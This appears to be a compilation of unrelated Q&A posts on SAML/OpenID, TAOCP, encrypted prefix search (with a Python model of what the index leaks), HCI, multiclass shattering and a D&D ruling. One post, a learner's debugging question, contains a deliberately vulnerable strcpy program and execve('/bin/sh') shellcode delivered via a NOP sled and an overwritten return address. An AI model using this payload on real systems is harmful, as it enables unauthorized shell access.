Did not understand a few things about SAML and OpenID

In OpenID, the client needs to support the OpenID identity provider, and the client (application) needs to register with the OpenID identity provider. This is similar to the service provider in SAML registering with the SAML identity provider.

In both cases, client registration is required. So, apart from the XML data and the OpenID (identifier, URL), I could not understand the differences between the two. Can anyone explain the differences?

Are there any resources or forums online for helping me understand TAOCP?


Context

I am doing an undergrad math project that involves exploring Donald Knuth’s “TAOCP, Volume 4, fascicle 6: Satisfiability”.

I am having trouble parsing some of this material.

Surely there are some online forums where different sections are unpacked or discussed or translated into Python?

I googled this but cannot find anything that helps me.

Question

What are some online resources to help people parse TAOCP?

Surely many people have read this work before me?

64-bit buffer overflow fails with SIGILL, cannot understand the reason

I have been doing 32-bit buffer overflows for some time and I decided to try some 64-bit overflows, to explore some more realistic scenarios. I have compiled my code with gcc -fno-stack-protector -z execstack -no-pie overflow.c -o Overflow.

Here is the code:

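    #include <stdio.h>
    #include <string.h>

    void function(char *str)
    {
        char buffer[32];
        /* Unbounded copy into a 32-byte stack buffer: the overflow under test. */
        strcpy(buffer, str);
        puts(buffer);
    }

    int main(int argc, char **argv)
    {
        /* argv[1] is passed through unchecked, as in the original test program. */
        function(argv[1]);
    }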

Using gdb I determined how many bytes I need to write to control the return address. This is 40 bytes. So at first I tried to write 40 bytes of “A” and then 6 bytes of “B” to test the control of the return address.

Here is a screenshot: [image]

I found and tested a 23 byte shellcode that executes “/bin/sh”, so I try to write a nop-sled of 13 bytes, the shellcode and the first 6 bytes of the return address that need to change. So I come up with this (in gdb):

    r $(python -c 'print "\x90"*13+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x10\xe1\xff\xff\xff\x7f"')

I have set 2 breakpoints, before and after the execution of strcpy, and examined the memory.

This is the stack before the strcpy: [image]

where at address 0x00007fffffffe138 is the return address of function function: [image]

And this is the stack right after the strcpy execution: [image]

So in my understanding, after I press c to continue the execution, I must “return” to the nopsled and then execute the shellcode in gdb.

Instead I get a SIGILL, for illegal instruction.

[image]

I cannot figure out why this is happening; any help/suggestions/pointers would be much appreciated.

Need to understand the security flaw?

I am creating a database of encrypted values.


Let us say I store “John” which would be encrypted and stored as “Yoky”.

John | Yoky 

Now I store “Johnny” which would be encrypted and stored as “Koaddy”.

    John   | Yoky
    Johnny | Koaddy

Now with the above storage I will not get any kind of regex search functionality. If I wanted to search “Jo%” it will not work.

But what if I store the values after breaking them up, as:

    Jo      |   Yoky , Koaddy
    Joh     |   Yoky , Koaddy
    John    |   Yoky , Koaddy
    Johnn   |   Koaddy
    Johnny  |   Koaddy

Here the regex searches will work: “Jo%” and “Joh%” will both give Yoky and Koaddy, which is what I want.

I can see the obvious security flaw above that anyone can map out Jo, Joh.

So I have decided to store the encryption of these.


I will AES encrypt my stubs and store them.

    qkjklewr!j==      |   Yoky , Koaddy
    klkadsopos==      |   Yoky , Koaddy
    oensd%21op==      |   Yoky , Koaddy
    kaknvp23b02==     |   Koaddy
    kashdi2094j==     |   Koaddy

While performing any type of search, say “Joh”, I will first encrypt “Joh” and then perform the search; therefore it will map to the AES encrypted value of “Joh”, i.e., klkadsopos==

Note: Both columns will use different keys and algorithms to protect the data.


Note: This storage will be TDE encrypted. HDFS will be encrypted and I will be using Apache Solr for the rest.

I need to understand if I am missing something fundamental here.

Need to understand the security flaw?

I am creating a database of encrypted values.


Let us say I store “John” which would be encrypted and stored as “Yoky”.

John | Yoky 

Now I store “Johnny” which would be encrypted and stored as “Koaddy”.

    John   | Yoky
    Johnny | Koaddy

Now with the above storage I will not get any kind of regex search functionality. If I wanted to search “Jo%” it will not work.

But what if I store the values after breaking them up, as:

    Jo      |   Yoky , Koaddy
    Joh     |   Yoky , Koaddy
    John    |   Yoky , Koaddy
    Johnn   |   Koaddy
    Johnny  |   Koaddy

Here the regex searches will work: “Jo%” and “Joh%” will both give Yoky and Koaddy, which is what I want.

I can see the obvious security flaw above that anyone can map out Jo, Joh.

So I have decided to store the encryption of these.


I will AES encrypt my stubs and store them.

    qkjklewr!j==      |   Yoky , Koaddy
    klkadsopos==      |   Yoky , Koaddy
    oensd%21op==      |   Yoky , Koaddy
    kaknvp23b02==     |   Koaddy
    kashdi2094j==     |   Koaddy

While performing any type of search, say “Joh”, I will first encrypt “Joh” and then perform the search; therefore it will map to the AES encrypted value of “Joh”, i.e., klkadsopos==

Note: Both columns will use different keys and algorithms to protect the data.

Note: This storage will be TDE encrypted.

I need to understand if I am missing something fundamental here.
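An added example, not part of either post above: a small model of the stub index both posts describe, showing what the stored index reveals to someone who can read it but holds no key. HMAC-SHA256 stands in for the posts' "AES encrypt my stubs" step (any deterministic keyed transform behaves the same way for this purpose); the function names, the key and the minimum stub length of 2 are assumptions.

```python
import hashlib
import hmac

# Constructed sample data: the two rows from the post (plaintext -> stored ciphertext).
RECORDS = {"John": "Yoky", "Johnny": "Koaddy"}
INDEX_KEY = b"constructed-demo-key"  # assumption: dedicated key for the stub column
MIN_PREFIX = 2                       # assumption: shortest stub, as in the post's "Jo"

def token(stub, key=INDEX_KEY):
    """Deterministic keyed token for a stub (HMAC stand-in for the AES-encrypted stub)."""
    return hmac.new(key, stub.encode(), hashlib.sha256).hexdigest()[:16]

def build_index(records):
    """token(prefix) -> set of ciphertexts whose plaintext starts with that prefix."""
    index = {}
    for plaintext, ciphertext in records.items():
        for n in range(MIN_PREFIX, len(plaintext) + 1):
            index.setdefault(token(plaintext[:n]), set()).add(ciphertext)
    return index

def search(index, prefix):
    """Lookup for 'prefix%': the key holder tokenizes the prefix, the store matches it."""
    return index.get(token(prefix), set())

# Everything below uses only the stored index, never the key or the plaintext.
def leaked_lengths(index):
    """Each row appears under one token per prefix, so its plaintext length leaks."""
    counts = {}
    for rows in index.values():
        for row in rows:
            counts[row] = counts.get(row, 0) + 1
    return {row: n + MIN_PREFIX - 1 for row, n in counts.items()}

def leaked_common_prefix(index, row_a, row_b):
    """Tokens listing both rows reveal how many leading characters they share."""
    shared = sum(1 for rows in index.values() if row_a in rows and row_b in rows)
    return shared + MIN_PREFIX - 1 if shared else 0

if __name__ == "__main__":
    idx = build_index(RECORDS)
    print(search(idx, "Joh"))
    print(leaked_lengths(idx))
    print(leaked_common_prefix(idx, "Yoky", "Koaddy"))
```

The search works as the posts intend, and the same determinism that makes it work exposes each value's length and the prefix relationships between rows, independent of TDE or disk encryption underneath.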

I got an HCI assignment from my lecturer, and I don’t understand it

I got two assignments. I could do the other one, but not this one (which is shown in this post). I don’t know how to give examples for the description in the assignment by applying those 2 things (the cognitive in a reaction time task and the findings of 7(+2)) given in it. Could anyone give me some hints or solutions? I’ve searched for information on Google to apply to the answer, but it still didn’t make any sense to me. [image]

How can I understand the multi-class version of “shattering” intuitively?

I’m learning machine learning. VC dimension is a good way to measure the complexity of a hypothesis class for binary classifiers and has a very good intuitive explanation from shattering.

I know that both dimensions are based on the “shattering” concept.

When we discuss VC-dimension, shattering means $H$ has all the behaviors on a set of size less than $VCdim(H)$. That is:

Let $C=(c_1,\dots,c_d)$ be a set shattered by $H$. Denote the restriction of $H$ to $C$ by $H_c$:

$$H_c = \{(h(c_1),\dots,h(c_d)) : h\in H\}$$

Then

$$|H_c| = 2^d$$

However, according to the definition of shattering on Page 403 of the book “Understanding Machine Learning: from theory to algorithms” (You can click the link to download the book.), the multiclass version of “shattering” is as follows:

We say that a set $C\subset X$ is shattered by $H$ if there exist 2 functions $f_0$, $f_1: C\to [k]$ such that

  • for every $x\in C$, $f_0(x) \ne f_1(x)$.

  • for every $B\subset C$, there exists a function $h\in H$ such that

$$\forall x\in B,\ h(x)=f_0(x) \text{ and } \forall x\in C \backslash B,\ h(x) = f_1(x)$$

Here, $H$ does not have all the behaviors on a set of size less than the Natarajan dimension. That is,

$$|H_c| \ne k^d$$

when $k>2$.

How do you understand the definition of the multiclass version of shattering, especially this point?

Does casting Tongues on the tarrasque (a language-less monstrosity) let it understand language?

Tongues description:

This spell grants the creature you touch the ability to understand any spoken language it hears. Moreover, when the target speaks, any creature that knows at least one language and can hear the target understands what it says.

It specifies that creatures hearing the target must speak at least one language, but does not specify that the target must. To me that seems like an exception that proves the rule, so I think Tongues can effectively be used like Speak With Animals, but on any one creature at a time (instead of all beasts).

Does that ruling seem consistent with other rules related to creatures that understand no languages?

This specifically came up because I’m planning a RAW-as-possible level 20 fight against the legendary tarrasque, and one of my players suggested they should cast tongues on it.


Related, but doesn’t address Tongues spell: Do either Speak with Animals or Awakened Mind let me use Command on animals?